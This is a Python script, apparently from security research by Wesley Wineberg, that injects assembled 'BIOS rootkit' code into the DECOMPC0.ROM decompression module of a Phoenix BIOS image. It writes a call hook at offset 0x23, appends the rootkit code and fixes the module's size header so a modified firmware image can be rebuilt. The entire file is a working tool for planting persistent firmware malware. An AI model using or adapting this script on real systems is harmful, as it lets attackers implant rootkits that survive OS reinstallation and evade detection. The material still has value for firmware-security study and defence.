#!/usr/bin/python
import os,struct,sys

###############################################
# BIOS Decompression module patching script - By Wesley Wineberg
#
# The Phoenix BIOS Editor application (for Windows) will generate a number of module files
# including the decompression module which will be named "DECOMPC0.ROM".  These files are
# saved to C:\Program Files\Phoenix Bios Editor\TEMP (or similar) once a BIOS WPH file is
# opened.  The decompression module file can be modified with this script.  Once modified,
# any change can be made to the BIOS modules in the BIOS editor so that a new BIOS WPH file
# can be generated by the BIOS editor.  The decompression module can alternatively be
# extracted by phnxdeco.exe, but this does not allow for reassembly.  This script requires 
# that NASM be present on the system it is run on.
#
# INPUT:
# This patching script requires the name and path to the BIOS rootkit asm file to be passed
# as an argument on the command line.  
#
# OUTPUT:
# This script will modify the DECOMPC0.ROM file located in the same directory as the script
# so that it will run the BIOS rootkit asm code.


# Display usage info
if len(sys.argv) < 2:
	print "Modify and rebuild Phoenix BIOS DECOMP0.ROM module.  Rootkit ASM code filename required!"
	exit(0)

# Find rootkit code name
shellcode = sys.argv[1].lower()


# Assemble the assembler code to be injected.  NASM is required to be present on the system or this will
# fail!

os.system('nasm %s' % shellcode)

# Open and display the size of the compiled rootkit code
shellcodeout = shellcode[0:len(shellcode)-4]
decomphook = open(shellcodeout,'rb').read()
print "Rootkit code loaded: %d bytes" % len(decomphook)

# The next line contains raw assembly instructions which will be placed 0x23 into the decompression rom
# file.  The decompression rom contains a header, followed by a number of push instructions and then
# a CLD instruction.  This code will be inserted immediately after, and will overwrite a number of
# mov instructions.  These need to be called by the rootkit code before it returns so that the
# normal decompression functions can continue.
# The assembler instruction contained below is a Near Call which will jump to the end of the 
# decompression rom where the rootkit code has been inserted.  This is followed by three NOP 
# instructions as filler.
minihook = '\xe8\x28\x04\x90\x90\x90' 

# The following would work but is an absolute call, not ideal!
# minihook = '\x9a\x5A\x04\xDC\x64\x90' # call far +0x45A

# Load the decompression rom file
decorom = open('DECOMPC0.ROM','rb').read()

# Hook location is 0x23 in to the file, just past the CLD instruction
hookoffset=0x23

# Insert hook contents into the decompression rom, overwriting what was there previously
decorom = decorom[:hookoffset]+minihook+decorom[len(minihook)+hookoffset:]


# Pad the decompression rom with 100 NOP instructions.  This is not needed, but does make it 
# easier to identify where the modification has taken place.
decorom+="\x90"*100+decomphook

# Pad an additional 10 NOP's at the end.
decorom=decorom+'\x90'*10

# Recalculate the ROM size, so that the header can be updated
decorom=decorom[:0xf]+struct.pack("<H",len(decorom)-0x1A)+decorom[0x11:]

# Save the patched decompression rom over the previous copy
out=open('DECOMPC0.ROM','wb')
out.write(decorom)
out.close()

# Output results
print "The DECOMPC0.ROM file has now been patched."
